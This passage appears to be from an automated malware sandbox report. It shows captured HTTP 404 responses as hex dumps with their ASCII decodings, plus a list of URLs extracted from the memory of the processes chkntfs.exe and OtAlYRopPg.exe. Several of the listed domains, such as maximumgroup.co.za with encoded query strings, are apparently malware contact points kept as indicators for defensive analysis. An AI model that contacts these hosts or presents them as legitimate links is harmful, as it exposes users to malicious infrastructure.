Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:12:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:12:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:12:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2BkyB%2BECMl8AWZ6kVIFeZyjbCdF4ukGG6UKffVeZoKVwPDqz1y9pybc0iKI0P1WeopKgaThvfjkP0nKKXKWasXm1u06GXD%2B3PachlS4VmeIR8Ew76e4JIG0zzVp0RiLyGTzY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffb340e7f754414-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1598&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=775&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:12:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B8dOeIYWYRPqMd47IT8Z1o6QnbCukbPxs%2BQHGV7mHH0bdyKFeufT6ypuFc3fpPPQA4gW10RuSaN7c%2Bti9KbZpicDVLwvqHeGmA6lTVBQtDFvoNnQydf4%2F87Zi4%2BeOWVcjnu0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffb341e489042e9-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1687&rtt_var=843&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:12:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DJDDB%2F2M9nEZ7cYFHW6mKb58ePa3bHBQj9SsEqrBXF8ufupJyX0aE6SnKnWj5gpW28FwvFrxtuAnThEc%2BBe0tniA4fnTXY4e%2FQkkukKd9UWcRdrQ62aziAG%2Bq9E%2FgR9%2F%2Bhsv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffb342e5b14c358-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1597&rtt_var=798&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1812&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:12:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fg%2Foqeh5PKJsRIbWbtuaHM5dHL9iQvDdgTx9fr5WM8AzcZhuNevVt8I%2FdajrOaxy44AXjoCw67pcZ%2FgAmCxJjR1wuhDl4hDeLelnBJakTyeEU8KwS%2BMXW8ptPJ0PV0YX%2FfwR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffb343e3d3f42e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1680&rtt_var=840&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=519&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frien
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:13:23 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:13:26 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:13:28 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:13:31 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003518000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://einpisalpace.shop/
                Source: chkntfs.exe, 00000006.00000002.4625579447.000000000613C000.00000004.10000000.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.00000000044CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://maximumgroup.co.za/oqj2/?Mn=PdO8wZnxGnZX&-0-L9xY=tgXYdkLIQp5X1DQK2Lc0zTS8fsB8z/iBngGKB1idJuR6
                Source: chkntfs.exe, 00000006.00000002.4625579447.000000000613C000.00000004.10000000.00040000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.00000000044CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://maximumgroup.co.za/oqj2/?Mn=PdO8wZnxGnZX&amp;-0-L9xY=tgXYdkLIQp5X1DQK2Lc0zTS8fsB8z/iBngGKB1id
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.68markavenue.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.69meinvzhibo.com/binding
                Source: OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.agrobazar.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aguardiente.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aicaozhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.allprinting.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.americanstar.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.anmozhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.astellia.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.athousandwords.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3deb
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d40f1d
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/adblock.fe363a40.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.js
                Source: OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/appsdetail.fe363a40.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/bl.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babyzhibo.net/template/news/wandoujia/static/js/broadcast.js
